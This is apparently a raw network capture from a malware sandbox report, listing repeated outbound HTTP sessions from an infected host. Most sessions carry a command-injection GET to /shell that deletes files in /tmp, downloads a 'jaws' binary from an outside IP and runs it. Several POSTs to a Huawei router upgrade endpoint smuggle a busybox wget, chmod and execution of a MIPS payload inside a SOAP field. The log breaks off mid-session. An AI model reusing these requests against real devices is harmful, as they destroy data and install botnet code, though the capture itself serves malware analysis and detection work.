                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            235192.168.2.2357954121.194.9.19880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:51.436085939 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:51.772377968 CET353INHTTP/1.1 403 Forbidden
                                                            Server: Byte-nginx
                                                            Date: Fri, 26 Jan 2024 14:31:51 GMT
                                                            Content-Type: application/octet-stream
                                                            Connection: keep-alive
                                                            Byte-Error-Code: 0060
                                                            Content-Length: 24
                                                            via: cache03.bjcedu
                                                            x-request-ip: 81.181.57.74
                                                            x-tt-trace-tag: id=5
                                                            x-response-cinfo: 81.181.57.74
                                                            x-response-cache: miss
                                                            Data Raw: 31 32 37 2e 30 2e 30 2e 31 20 63 6f 6e 66 20 6e 6f 74 20 66 6f 75 6e 64
                                                            Data Ascii: 127.0.0.1 conf not found


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            236192.168.2.2358784210.243.112.15780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:51.438281059 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            237192.168.2.23531328.130.31.21380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:51.441433907 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:51.779531956 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.22.1
                                                            Date: Fri, 26 Jan 2024 14:31:51 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            238192.168.2.235823423.57.227.14280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:51.452287912 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:51.804970980 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:31:51 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:51 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 63 32 31 30 66 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 31 31 26 23 34 36 3b 62 64 36 36 32 37 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;ac210f17&#46;1706279511&#46;bd6627e</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            239192.168.2.233758274.126.94.2480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:51.555751085 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:51.675597906 CET433INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:51 GMT
                                                            Server: Apache
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            240192.168.2.234162865.9.190.8080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:51.771759033 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:51.987936020 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:31:51 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            241192.168.2.2348154170.84.253.6980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:51.813606024 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            242192.168.2.2333582122.116.234.20780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:51.956820011 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:52.243609905 CET163INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59
                                                            Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            243192.168.2.2346802123.56.30.12180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:52.000684023 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:52.328489065 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:52 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            244192.168.2.2341036117.215.83.25580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:52.153013945 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            245192.168.2.2358516156.254.67.20537215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:52.465785027 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:56.643980980 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:02.787005901 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:14.817315102 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:40.157768965 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
